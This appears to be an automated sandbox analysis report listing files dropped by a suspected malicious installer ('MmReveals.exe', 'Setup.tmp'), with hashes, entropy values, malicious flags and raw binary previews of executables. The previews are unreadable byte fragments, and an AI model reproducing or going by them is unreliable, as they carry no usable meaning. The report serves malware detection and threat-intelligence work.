                        File Type:PDP-11 overlaid pure executable
                        Category:dropped
                        Size (bytes):29696
                        Entropy (8bit):6.475457272197305
                        Encrypted:false
                        SSDEEP:768:wb3jsJhQlEF2VVay1N5J3SoO6Qku2ox3hOk3Y:wbgjQWq8GV3jOTJh1o
                        MD5:5A266EEC30EACC63DAA99878F4CB0B72
                        SHA1:050076B95A44BB16AB24B63B15C5DD5459B85874
                        SHA-256:6561B06876FEF0C918D554B61E9515EF8E4BC9029ABCBA1E7268D82D423D8DA7
                        SHA-512:F0667E3DDA0C10842EB2E4FEB09622C72B665299C5C9D9EC0E9E659B7F3B6B4D0F6C655FA4AA76F11B8907DAB8A04246F0EDAEE1EB357539A8FAE0236703FCD4
                        Malicious:true
                        Preview:............!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...y..U..........".................*.............@.................................w.....@...@.......@.....................L...|....................8..0....0...q...;..............................@X..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...............................@..@.reloc...q...0...r..................@..B.........................................................................................................................................................................................................................................................................................................DQL......h..C.....Y...L..h.C..{..

                        C:\Users\user\AppData\Local\Temp\Optimize

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):17408
                        Entropy (8bit):6.509527573507022
                        Encrypted:false
                        SSDEEP:192:OrQBcgyTMPtcETjr3D80GMKTY89cKyjB+mOofFsBk2yR6DXAhADUh95ybOIOo9AC:OrCcLgTjr3D8kcHyjJFsBNywAhADsULr
                        MD5:7833DB1E09C318E19A18117D87960318
                        SHA1:701E55234EAFAE688E8149DD0FA74A597F7D0EA8
                        SHA-256:8E613765BBA64B8A3D650FDBA3DFD7AD40558AC9319336F48389AC847FDFDA46
                        SHA-512:75777BBC0410396C421476FE2502C612FAE363ED87C948DC97617BBFBE668F04DF260AC43C8DD15EEC661529B5D6B3F434927ADFA53C6A28757101BFA8595093
                        Malicious:false
                        Preview:....813.....]C*.:.i./.h.O+++...{.0==-..k../..%/...2 B0..`..L&..~......NNN....]........B.....YvL..SR|...TnZ.$J..7vlAR....IDAT..vl.QS...Z>......&z..<.G.....m..i<~...........X.....H$.o..ZYY.JL~.!..^........AEk ..X...?....d2..N..D"1....d0==...Q.\..+...l..N.2...,.)h...H......}%...L.....F...0.%..,.........8.sss...?l...........~.....).Z..+..+.K...@rP.AH2.c......>.&...|>....\........A...{.-6.Md...D......0n... ..G.U.af\.D....A.........@+4.y......q..U....s.\..v.4==......7oV#.....|....P~....@./...<.2.[.....L....7...FGGgI.....cdd..x\.?(..z..?......u..N....~.e}z- Ss..... .c...|Fz.pO..*R.....1==.h4....=..?.D"........./W.W...+..."..[.K ..R.5. i.6nmm9>..H2.Ld2.[f......D........ ..I.Ty.2....:..u../.~..u.?...&..^....H&...............Z ..lff&y......r]..............%P.../...=z.Y]]....Z*.V,..D"1!Tw..B.,.....>5.@k..LHN.h..%.H...=_>...H...d....t......b......~.V.mz<.....n......W..b4.%.H.^.d.+g.....`(.` ....X...?.lllL....J.r.b.,.....E$.I1.0..\...m.^Ky......k(.0.."-..

                        C:\Users\user\AppData\Local\Temp\Pepper

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):78
                        Entropy (8bit):2.448303597829603
                        Encrypted:false
                        SSDEEP:3:CkLOvNUqt/vll:CGq
                        MD5:37D8A9DB0253FB2410345A012DEB0C12
                        SHA1:964314E1D6B3632CD22AE95D3731139D5136443A
                        SHA-256:B34BE6A42ADE40EB84BEDF48A2651E1389EA6A32EB9FAB652E10AF253ADE437F
                        SHA-512:D8564667106D712381EFD04F811FDCC9BEDE88ECBCAE1FF48D24E56CCCD02689A780CFC3AC3226C3FC19EC4BB844BD67E12F3C361D7586508293CB924F54205F
                        Malicious:false
                        Preview:TRUEANALOGMINDOC..MZ......................@...................................

                        C:\Users\user\AppData\Local\Temp\Pontiac

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):45056
                        Entropy (8bit):5.030971375798974
                        Encrypted:false
                        SSDEEP:768:osWjcdeDvFQC7VkrHpluuxdCvEHKKgItUHk:osWjcdmQuklluhvEHKxk
                        MD5:57F6091B9D7F02A70F51BABB2E8E33A2
                        SHA1:1EC92FF6C37AE1B66A956AB521B561376C2CAB1A
                        SHA-256:E5F17527B397125F260651BCD5FFA2DF07B50C1A2C983073C10589EF38BF18A1
                        SHA-512:451833C1807B66DFBC90FE48E95B4F05D77AC49220CC20E6574028DC119A6FCA93C9D49C42102619E6D0DAF4281C21355BED0E2581C97EDEB0130DB0AB491622
                        Malicious:false
                        Preview:-.S.E...t.h.-.T.H...t.r.-.T.R...u.r.-.P.K...i.d.-.I.D...u.k.-.U.A...b.e.-.B.Y...s.l.-.S.I...e.t.-.E.E...l.v.-.L.V...l.t.-.L.T...f.a.-.I.R...v.i.-.V.N...h.y.-.A.M...a.z.-.A.Z.-.L.a.t.n.....e.u.-.E.S...m.k.-.M.K...t.n.-.Z.A...x.h.-.Z.A...z.u.-.Z.A...a.f.-.Z.A...k.a.-.G.E...f.o.-.F.O...h.i.-.I.N...m.t.-.M.T...s.e.-.N.O...m.s.-.M.Y...k.k.-.K.Z...k.y.-.K.G...s.w.-.K.E...u.z.-.U.Z.-.L.a.t.n.....t.t.-.R.U...b.n.-.I.N...p.a.-.I.N...g.u.-.I.N...t.a.-.I.N...t.e.-.I.N...k.n.-.I.N...m.l.-.I.N...m.r.-.I.N...s.a.-.I.N...m.n.-.M.N...c.y.-.G.B...g.l.-.E.S...k.o.k.-.I.N.....s.y.r.-.S.Y.....d.i.v.-.M.V.....q.u.z.-.B.O.....n.s.-.Z.A...m.i.-.N.Z...a.r.-.I.Q...d.e.-.C.H...e.n.-.G.B...e.s.-.M.X...f.r.-.B.E...i.t.-.C.H...n.l.-.B.E...n.n.-.N.O...p.t.-.P.T...s.r.-.S.P.-.L.a.t.n.....s.v.-.F.I...a.z.-.A.Z.-.C.y.r.l.....s.e.-.S.E...m.s.-.B.N...u.z.-.U.Z.-.C.y.r.l.....q.u.z.-.E.C.....a.r.-.E.G...z.h.-.H.K...d.e.-.A.T...e.n.-.A.U...e.s.-.E.S...f.r.-.C.A...s.r.-.S.P.-.C.y.r.l.....s.e.-.F.I...q.u.z.-.P.E.....a.r.-.L.

                        C:\Users\user\AppData\Local\Temp\Precipitation

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):25600
                        Entropy (8bit):6.507217585416609
                        Encrypted:false
                        SSDEEP:768:O+jBAfe6TtgguvkFec+jJ5PZvimdFiFGbC:ZfUCJ5h3Fw
                        MD5:F751364CFA63775137CB5146FE58A499
                        SHA1:2B74004F95CEDF6EEEAA413ADF3572962C8F5754
                        SHA-256:24144F909C12F3BB5D11ED1FA3052D22079198E6E5CB0748EC740E8075925A0D
                        SHA-512:62116162EDA5AC185EB9BBE5165390487EE0C05DDF328B513944ECFBCD0D5E0D7CC2A19F23A07A78BF61B559CCDEE34728E7FD957301D5C66F00DEEF4EBF93D5
                        Malicious:false
                        Preview:..X..0.D$..G..p.........F.....DX.P.\...Y..t#.G.C.p.........F......XkD$........D$..\$..\$..D$4.D$..?...j.j....H....d"...M.h..I..............j....v..L$X......G.j).p....f.....t..L$d..........9....v..L$h.....G.j).0...6.....t.......P..........v..L$H.d....|$..w..L$0.....T$,Q.t$(.L$0.t$(..........u.Pj..<....t$.Q.L$(.{.....u..M..D$TP.....Jj....u.j............H.u.j......j.......u.........&..F.......j.j..H....@!...L$ .r..._^3.[..]......LG..KG.xKG.DKG..KG..JG..JG..JG.{JG.U...o.....u.V.u........&..F.....^3.]...U..E..@....x..u....x..t.V.u....b....&..F.....^3.]...U.....E.VW.@..0.......N....E..A..E.A..E..A..M..E.........u..u...|.I..E.P......u...........M..F......>....._3.^..]...U..E..@....x..u....@.V.u.....u................u.....3.@.F..........&..F.....3.^]...U..E.V.@..0.~..u..6j).........t..u....W...3.@.F.....j*........u....t..6............)....&..F.....3.^]...U..QQ.E.VW...@....y..u....@..x..u....y..u....U.RP.C.....t..u.........E....E..F......F..".u........&.3.@j..F.P...H........_3

                        C:\Users\user\AppData\Local\Temp\Previously

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):23552
                        Entropy (8bit):6.5589376742169385
                        Encrypted:false
                        SSDEEP:384:dQRiUYoelmXaQtviQM5uOcylkpDNQeScHgkYSO+qlf2eE4TJH05eZ3ChIYXBdSsu:dZoeqaQ1/uu1ylkp5VAkGh2RDuaIYXBg
                        MD5:C289C1EF7516A3290E029D6A7E5135FE
                        SHA1:78CBEB2FFA4339E531DB791A1E9F2E745B917519
                        SHA-256:EDCC787AF1FA464F28F3D01A414FA94509512A79E988C9A6E6DCBB25AB4A25F8
                        SHA-512:C85C7F16182BD65D0805FB77856506DC49C16BADB62F497F043AB8601E1C26D9C8DD44E85A76BCFCF5F107001E3FC21AF4FFFA0462F1B862784324D679A5966B
                        Malicious:false
                        Preview:.M..\......K......@.f;E.t0f..@uIBj3.....Yf9H........C......@.Ph.......t....M..2....M..*..._^[..]...j.jn..C.......@.Pj.XP....C..D....@.Ph.....U....SV.u.W..3.j..F.A[.M..@.f9X.u..M.3..j.e...E.e..j.P.E..M.PV.......x..N..E....f9X.t...@...Pjr......M...._^[..]....M........M.u..e...3..~..\....>.tC........8.t.........8.t.........8.u...C.....M..@.@.......;].|..j.h.......=....{...U...LSV3.3.W...].@.]..M..]..]..E..oM...u..E.......H.E.E..E..E..P.H....}....U.........}........I3........J...f9p..u.u...........Ht#Ht.H......Hu.K..u...I.E...M.M...u.8].u..A.3..E...E.....f9H.u..8.u...j..U.Y...E...P.E.PR..............U..M..E.@....f.x..u.....0......E...E.."...C......E.@......@.Pjr.<.}..t&.E...t..E.P..\....|....}...E.u..E.....E.j.......h...........M..}....M..u..._^[..]...U.......S3.VW...E.3.E.A.E.E...L..}.M..u!....tL.h..I....L......h$.C...z..Y.u..]....C.A.....3.f9B.u7.....t"HHt.Ht...B.Pj......j.Z.A.....3.B....B...Pjn......U..=.rL...U.u.j.Z....u.B.U..K...j3_.E........f9x

                        C:\Users\user\AppData\Local\Temp\Purchasing

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):63488
                        Entropy (8bit):6.700214587939564
                        Encrypted:false
                        SSDEEP:1536:ADzMdMhrNCsGJh5yA05E22VelTXzSj9xb7XDh1RlyxcZqvi1:0M0lAYrlTGj91DhrlyQ
                        MD5:1FBEEEB8A198656EFBF434AF4366A042
                        SHA1:35A2A4CA3BB39B79E79EB16EACA4D76B0D4A85E0
                        SHA-256:5A2EEA9C51D2C4449DC72A543E782E687B12AC0845D2A2C9706DA0365FDB87A0
                        SHA-512:9C9E1745F2397CD13B26B58609600EA79F165760BBDB20420CBB15E698B20520FB7C1782B73F2ECEB8A236BD1CA7A71DE442AB73F1A29FE4AE8201FC6B8341ED
                        Malicious:false
                        Preview:..P....U..}.;...n9...E...M.@P.u.V.u..u..2.........'4...E.U....B.U.;.s.3...4.....u..F|...E...........9..;F|...9...........;E....8..f.......f#......f;.u.....E...@..P.u.V.u..u..-2.......t..3...E...M.@P.u.V.u..u...2......}............n3...E.9E....8...M.;N|..............M.%....=....u.............%...............M.......v...n..28...................M......8...M..E....E.@P.u.V.u..u..[1.........].....2............7..;..............2...E.9E....7...E.;F|..a..........E.......v...n...7...................M.....z7...E...M.@.E.P.u.V.u..u...0.......t../2...E...}.@P.u...V.u..u..0..........2...E.9E... 7..;~|sr.......U..t*..%....=....u.............%..............R.U..)!..........6...E....E.@P.u...V.u..u...0.......t..1............6..;......\.............6..;V|..{6..;......;....M..........`6..;N|..W6........E...}.@P.u...V.u..u../..........1...U....M.E.;E....6...F|+.;.w....P.u.W.'F.......u..}..:.U.........F|...+.;..........P.E.PW..E..............M.<O.E....E.@P.u...V.u..u.../...M...

                        C:\Users\user\AppData\Local\Temp\Scary

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):6.466205625101586
                        Encrypted:false
                        SSDEEP:768:F79sAOOWNMZmwfHh17McqQHEdQ7iwDIUKh:F9sAO+kdIlDbKh
                        MD5:345A00A391EF07A9A2EBC03D00C87457
                        SHA1:F86D44EF822ADE1207F99597723C60CE51EDD7A1
                        SHA-256:95562ACA3CB3D37E726B77DAAB78F0BAF4866465B93E42A4DEA2F969989C35EB
                        SHA-512:0BA81C9DE1EE2E4F0D8727E2630A59ED842BC101BC6C408ED0C6F5F9A77988943160FBDF03499671EF74391EB5CE5C48B0CDAB740A6DEDA05BEA57152DB5839D
                        Malicious:false
                        Preview:P...R...x..u..M..Gs...u....WW.H.......E.P...Q..E.P...Q.....3.h....Pf............P.R...E.....U.E........E..E.E.3..E.E..U..U.P.U..E.x.F..}.....I.....t;.M.......P.r........PW....I.W..f.......t".M.......P.r....3.P..j..H........}..t..u.....`.I..M..x?.._^3.[..]...U.....$....G=..S.].3.VW...D$..C..L$,.|$..p....o...F.3.B.{...T$(.0r..C..H..r..3.B;.u...3...3...\$.f9........L$(.....+u..........-u....3........Rtg..rtb..AtY..atT..StK..stF..Ht<..ht7..Nt+..nt&..Ot...ot...Tt...t..M........................j.X..j...j ....;.u....|$....D$....3.f9...V....E..@..0....n...N..T$....D$..A..D$..A..D$ .A...D$$....#....$0...P.D$4P..$8...P..$<...P.t$(.c.......$0...P..$4...P..P....$8...P.D$<P..O.......$0...Ph......0.I..=..I...$0...P...t@.L$0.7o....t..D$0P....I..L$..t$.....#.P.D$4P....I...u8..$0...P..u....]n..3..F........s.u....Fn..3..F........e..tN.D$0P..D$0h.K.P.{O..YY...t$..t$..L$0.D$4.t$.VP......u..u.....m..3..F.........$0...P..L$...<.._^3.[..]...U..E.Vj...@..0.E.P.......t).......E.......p

                        C:\Users\user\AppData\Local\Temp\Se

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):26624
                        Entropy (8bit):6.279320534560886
                        Encrypted:false
                        SSDEEP:768:/PDqdU7SIc/jnsRf4rJsb25v0hL4G+CAiwo8Z8T5RZWfeTcmr5DhaED:/2dU7SP/jnsF4rJsx9RZqegm5kED
                        MD5:0CBB04B1F3A1713685E51D611C9958C5
                        SHA1:907E4DE587C4C2FC12418F36158428B7252D083D
                        SHA-256:D5BD599E463E0087634C0A3BE19C15839832D61BA48488DDEFF5D83E4013A0F8
                        SHA-512:25F7E9AD1B4A361C18597646FF470E2B15993242C49F8EA0F40A1691855584DD3E861385D33E11D5EA3176764521A39291AB32369AA024B42E25EB74C037BA30
                        Malicious:false
                        Preview:.9E.r<.M.+.f..f;.4...u%.............f.A.......f;.6...u.............E...........E.;E.......f...E.....f#E..E.....f;E.E.u.....E.......;E...:.......9E.........x.....t(9E.v_j.......R..M.P.Y..............t8.V....9E.r-.M.+.f..f;.4...u........t-f.A.f;.6...t ........x....E...U.9U.......r..........E..U.f.z...........t.........;......f.:..........U.....;...1............;.t....;.t.;........E...U..F....}....'....E..E...........t0................$.4hD...(......,....<.U..U.;.w5.}...Q..,........U.t.;.s.f.......f#......f;.u.....U.....3...|...9u.tu..t*9E.sl.u.......R..M.P...........L....U..;........+..M.;.w*f..f;.4...u..............f.A.f;.6.................|....U.9u.......;......;.....v5f.z..u.;.s*f.:.u$.G.....u....t....t........u.....U....U..u.....................M....~".U.+.}.E.+......8.X....~.+....p..........Q..M...........|!.......P.........P.E....P........9].~..M.............8dJ.....Q...;...Y...3..[.......i....E..<}....;.~......3...4.+......;.....#...9...G.......v.;.r..&...

                        C:\Users\user\AppData\Local\Temp\Seek

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):28672
                        Entropy (8bit):5.915263981899243
                        Encrypted:false
                        SSDEEP:384:nBjwTZwNKm7AI4xhLk5QdSJBkHn7DPhJhFTqUF2zCTWy1x1ab5lbTHVi5GwUvc7z:B+I0IKQ8SbkXhdqgWWwr2G+jvEHHU
                        MD5:7B8A3A110041FF45398E6B411E012938
                        SHA1:C007FA1E32340D06C6FF94E566E6E54ADE8455C7
                        SHA-256:AEF4DD356C6667D6D58A158B3CEB7ABEF485669651679E4F800A5F5CA5FA6668
                        SHA-512:7E364645072F287B49B319444C1EBF7418CB5570F9F986D5598FB2B32C3DA58899D39571236783062CE726E7BD2398504C0FCC4E13D00E20445EF97331C076F8
                        Malicious:false
                        Preview:......j.....I...._^[..]...U..S.].W.u..3......E.YY..t...+;.....3..|..Y........~.2..'V.u.W.3V.r......3.f..~^9E.t.G..?......._[]...VW..4.I.....h.I.....tmS..gL.V....y.....tY...hL...W....0.x......t?..$hL.....9.t1.V..$hL.............u.......P......Ph.....1....I.[_^.U..}..t..u...gL..x......hL......hL....u.3.....hL.......0..<.I.3.@]...U....hL.W.}...t.W..gL..<x......u.2.......hL.V....0..u...\.I.9.t.2.....j.V..gL..3u....t....E.j.h..H.....x....E.....|....E..........E..%LhL....PhL.........l....ThL...p....XhL..6..x.I..}..LhL......t.;.t.P..gL..Jw.......u..'...^_]...U..}..t..u...gL..Yw......hL......hL....u.3..-..hL.Wj.......8W..\.I..M.j.W....\.I..M._..3.@]...U.....|hL.VW.}..E...t=..99t..E.P.M..y....E...M..y..u..E..|hL.P.(....DQ......wi...7.u..~..u.3..-.M...^..V.M.}..Ti...E.|hL.P.R....M..Xi..3.@_^..]...U..}..t..u...gL..cv......hL......hL....tW..hL.V....0.~..t.9..gL.u....gL...v...H.I..f...}..t#.u..u...L.I..F...4.I.9.u...hL...gL.^]...U..}..t..u...gL...u......hL......hL....u.3..-..hL..

                        C:\Users\user\AppData\Local\Temp\Sic

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):49152
                        Entropy (8bit):5.797845051243723
                        Encrypted:false
                        SSDEEP:768:EoLVNIo8DJWxWWbP75qcaTlKWzhQVNsbSSkLQ7PqYIueIVvaOsibz1:PL/4aj5Vf7gqYrui31
                        MD5:9C4A2E0B1A7548FA2A3EADF25A82673C
                        SHA1:90F49BA8DEDB9074726DCD3C01D9814C1482945E
                        SHA-256:7046618D867C1B0E66FEFFC8986B45D66A989D3F60731C932331A817391A9B4B
                        SHA-512:9937B5BAA87D3F8C14D393B9E73EC7BBD5E7AFAB868DA1521874E613278A5020FF1B932E96F59EA007C0494E6FA2A28E2387F6B506ADACD87C07ACD0E1CCECB9
                        Malicious:false
                        Preview:v..6..|.I..f$..G...t..p$.G..w.^_]....7..3...W......u#.?..u._.V.w$...2...W.......Y..u.^_..w......Y...A(....t..A0j..RP.U..............U....S.].VW.....K...2..E.................3..d$..G.;G........O..G.....D5.F.A..G....r..w..W...........E..E..<.t9<.tP.K.............C....9C.rB.S....E.....C..K........x...j..E...P......t..}....2..._^..[..]...=.A....Z......C...ty......P.C..e............t..K.AQPV......3........3.s...j..E.Ph.....w..7....I..........E..............E.....q..._^[..].........U....SV..M......E..P......t .u..E.P.......M..]...^..[..]...2...U....SV..F,...us.e..j.XP.E.....Yj..E.........3.CY..tt...E..E..P.......u#.u...u..u......YV.....Y2..^[..]....u..E.P.k....M...........t(...t#...t....t......p....u.......e....u.......U..QSVW...M.......u.3.].9.v%j..E...P.......t!.u..M..E.../...C;.r...._^[..]....E...u...U....SV..M..@....u..E...P......t .u..E.P.......M......^..[..]...2...U..A,...t%...t ...t....t....t....u.]....].....].....A,...w3.$.=<A.......j ..........j@......

                        C:\Users\user\AppData\Local\Temp\Technologies

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):66560
                        Entropy (8bit):6.766766918528127
                        Encrypted:false
                        SSDEEP:1536:Vxj/JiB27MlRHq6EQU7uLQT6unj5ctpYuYtWGJG2kQyyv:VqM7MlRKecTF5c2p02kQ/
                        MD5:CEE4EA617F6D78EDC814E113DEB23AF6
                        SHA1:4653F7BBE7C1857B1175DF5826EDDF5F21AABF37
                        SHA-256:CDE6901A10D8DFE4C6DEAE40BA432A0817623B0C3C59F98A3E98F5029648CC64
                        SHA-512:092F290D43B9B69609F09648C135545C352BCEE8BF53AC6681452E6ADC55730DD6082A708B448D3EF2D732A4BF8FB5FD777C12C337784DF07AE2AEC3CF94C8A8
                        Malicious:false
                        Preview:....M...O.E..t.f.u..U......f#.f.u...t......f..f.u..E.j.QQ..$.1.......#j.Q..Q..$..........................^.E..8_].U..QQ.M..E..E..........%........]...f.M..E...].U..}......E.u...u.@].}.....u...u.j.X].M......f#.f;.u.j.......f;.u..E.....u...t.j...3.].U..E.. t.j.....t.3.@]..t.j.....t.j.X].........].S..QQ......U.k..l$........P.K.3.E.V.s .C.VP.s..........u&.e..P.C.P.C.P.s..C .s.P.E.P.....s ....s..c....=..L..Yu)..t%.C.V....\$....\$..C...$.s.P......$..P.X.....$....V.....C.YY.M.3.^.+.....]..[.U....S.].V.......t..E..t.j.....Y..........t..E..t.j..v...Y....u.............E........j..S....E.Y.....#.tT=....t7=....t.;.ub.M.........p.K....{L.H.M..........{,..p.K..2.M..........z...p.K....M..........z...`.K.....`.K.......................E........W3....t.G.M...........D.........E.PQQ..$.....E..........E..U...=....}.3...G.W..3.....Au.B.E............f.E..E.;.})+.E..E..t...u.G...E...E.t.......E..m.Iu..E..t....E.....3.G.._t.j......Y......t..E. t.j .....Y...3...^...[..].U..=..L..u%.u..E...

                        C:\Users\user\AppData\Local\Temp\Tion

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12288
                        Entropy (8bit):6.399121727243068
                        Encrypted:false
                        SSDEEP:192:8zk9hQpFL2OGmLmXQWbAq98Hg7wjhjt1XDcegBMtWS+XQVlfu6NW1/:CvgmLmXQWbAqTwj1XIegjSbZm
                        MD5:6152E5059BDF115EF3C7B8562E3D2DAA
                        SHA1:FC3537BD2C572F1E5F44C62FFDC341725EFC5122
                        SHA-256:4EEC518BB557354048323338141015C3FD5633C81B0ADEBC4554DF823F8C3B17
                        SHA-512:DA1DD8832112B2F91FD5FB258BE7E6E6ED6C75735690277F3D419F8536B1BF06D4E0AB4053A51D5FAA43EB1E7847FCCC827E0721FBB2B076D5704B176033B9F5
                        Malicious:false
                        Preview:.G......G..%.}....n....T$.3....@S.G.P...H.......V....I..L$H.9p.._^..[..]...U..QS.].VW.E...{..r..C..H......t..E...C..p....{....F..8.C..0...j....F....u........Y..u..u........&..F....._^3.[..]...U..SV.u.2.~..r..F..H........t...F..0........N..........u..u....{....&..F.....^3.[]...U..........SVW..3..M.h..I..\$8......E..@..0......N....D$..A..D$..A..D$..A..L$..D$.....l...t$..t$.....I....K..L$..s^....t.jc.l...K..L$..]^....t.j..V. .K..L$..G^....t.j..@.4.K..L$..1^....t.j..*.@.K..L$...^....t.j....P.K..L$...^....t.j.^...`.K..L$...]..........3.ja.D$L[.D$.S.L$....hp.K..L$...j...t$.....I.;.t...cu(...t#hL,I..L$..d...t$..t$..h...YG.D$..YC..z~..........M......O.3.Q..FVS.\$..Z....d$4..D$,j.VPS.|$<.t$H........L$ ...;.|e.\$HS.L$<..k..P.L$$.Q...Vj..D$(P.t$........L$ .z....L$8.gm..F...;.~....T$4...H........H...j.j.....L$..7m.._^3.[..]...U........k..SVWj.......I....E..@..8......O....E..A..E.A..E..A..M..E......h....3.......PWWWWW.u.....I..M...t.......P.....h..I......Wj..H.........

                        C:\Users\user\AppData\Local\Temp\Tranny

                        Download File
                        Process:C:\StrLocalGate\MmReveals.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):35840
                        Entropy (8bit):7.994801100442519
                        Encrypted:true
                        SSDEEP:768:HfvkzWD0cilJR7czChAME9572gQMCHsa0tOgh5P:/vL3i97FdE3qgQMCz0tOgnP
                        MD5:66D04BBFA2B3B805940FF6D39004F6FD
                        SHA1:7CFD832694CBA11437A2BBA62A8C809B133BA0E3
                        SHA-256:4FE85AD2A1CA692AC79BE4BBB8E67D0C745B40D57A4B5358E3BA3E5A9DF0B842
                        SHA-512:F68D52EB55FE879806AA6899E0C2263C400628E3076F2173A2D6D00E62BDF4E6EC7A7E5BE0E60D1E5E0007DBB8A6A679CC18110AE1AD0DE2F93EE32B897E362A
                        Malicious:false
                        Preview:...l..1..W..Z....f#n....Y^.Fut...r..N.x.AX.......H.7=.Z............Q.:.TUGh......<...g4.....6m...*.r.Et...j.q).^.....F...N\_.r....5g..C...a."..|FmW8....:x.C}.gw..^Vc...GjSZ9....l.!..fYW"...<./.....}g...I....W......o...;8jX..l*{+h....$.f.j..k....l...}....<..G.t)7J.......#c.....(6.W/..<.}..i......N_.Z.rC.a.wM........Z.d......?...X....$........NW...=..N.>.....@:.].P"..m.VJn...3h.0..#.rn..rVV...c@.F.......`..m..FQ:D...p..W7.k..#C[0(...Ce....U.....,..te....1..3.-....!......,;...V.#..._..5z.H.....S..>.........B....u.ICWkq....L...i..Y..6.Z....o.:bX..4; .$.8.\.<;..%K.(^..?...0.;N.KWL7..:2.j..K.NQ<A9.^.=.G.Z3..M.., .X.u.,...XVVeK<C6.G.....lsL.e..6..V..,....k.u.o..Zr....D)^...w.......p......aFB./..K....c....N..W=4.5...9.....L...{...[.w!.W8.E....7G.*...P....m.<7.Xf..BP.D.\...]{.d....2..v.I.oH..'...t.P..#9..S..!.;]..f>.su.8.<...[....T..h......J6...l...zS...,....\........5..21..4Y..]....w......tz.y..e.X/.... ..JVRt......l.%..P....'..v|..#.

                        C:\Users\user\AppData\Local\Temp\is-5MGM4.tmp\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.tmp

                        Download File
                        Process:C:\Users\user\Desktop\be5bb7f05c4f8de4d393134b63af2e6bf8a05e3ad3fb3.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):3117568
                        Entropy (8bit):6.370208522022616
                        Encrypted:false
                        SSDEEP:49152:VWGtLBcXqFpBR6SVb8kq4pgquLMMji4NYxtJpkxhGjIHTbE3336B:PtLutqgwh4NYxtJpkxhGP3338
                        MD5:6CE04FD06C6A2CADE4A53F1521743144
                        SHA1:E3060C2A0980017FDA65C799647AB52E154CD35A
                        SHA-256:953E01C7C8E8FF0C26AE66898442B5001E759928C9C7FA60C17B84EF5469227F
                        SHA-512:FC1544E6404107D5423F0642ED6C5720BE2F686B223478299A7A521978CC13BA64041D75175E4C03B0B0D180D456C1F98BD8654CC81828FDF353DC29523F7839
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L......c.................L,..B......hf,......p,...@...........................0...........@......@....................-.......-..9.......b...........................................................................-.......-......................text.... ,......",................. ..`.itext...(...@,..*...&,............. ..`.data...X....p,......P,.............@....bss.....y....-..........................idata...9....-..:....,.............@....didata.......-.......-.............@....edata........-......*-.............@..@.tls....L.....-..........................rdata..]............,-.............@..@.rsrc....b.......d....-.............@..@..............1.......0.............@..@........................................................

                        C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp

                        Download File
                        Process:C:\Program Files (x86)\StrLocalGate\Setup.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):3251712
                        Entropy (8bit):6.216482143463603
                        Encrypted:false
                        SSDEEP:49152:PEA9P+bz2cHPcUb6HSb4SOEMkBeH7nQckO6bAGx7jXTVZ3338b:T92bz2Eb6pd7B6bAGx7D333M
                        MD5:85FE6257CAB9D61BA8C481C64D0026BD
                        SHA1:63B8BE81F4D48501948EC8D9289FA1EC26AC301D
                        SHA-256:FB8559BBA5EB4AC4AAC8208CC2B9C7AE3AE185B7D4A26F9024E1DE286595BA94
                        SHA-512:998F323022BB9D76036A52B10BCDB1ACB5173EFD1338304DB985E478A3E81F86A33B10256E11B040436BE546DADFB6A7955C12B706B5B98A55EF0C03CCFC716C
                        Malicious:true
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...(..`.................:,..`......`F,......P,...@...........................2...........@......@....................-......p-.29....-.......................................................-......................y-.......-......................text.....,.......,................. ..`.itext...(... ,..*....,............. ..`.data........P,......>,.............@....bss.....y....,..........................idata..29...p-..:....,.............@....didata.......-.......-.............@....edata........-.......-.............@..@.tls....L.....-..........................rdata..].....-.......-.............@..@.rsrc.........-.......-.............@..@..............1.......0.............@..@........................................................

                        C:\Users\user\AppData\Local\Temp\is-M0QJK.tmp\_isetup\_setup64.tmp

                        Download File
                        Process:C:\Users\user\AppData\Local\Temp\is-9OEDA.tmp\Setup.tmp
                        File Type:PE32+ executable (console) x86-64, for MS Windows
                        Category:dropped
                        Size (bytes):6144
                        Entropy (8bit):4.720366600008286
                        Encrypted:false
                        SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                        MD5:E4211D6D009757C078A9FAC7FF4F03D4
                        SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                        SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
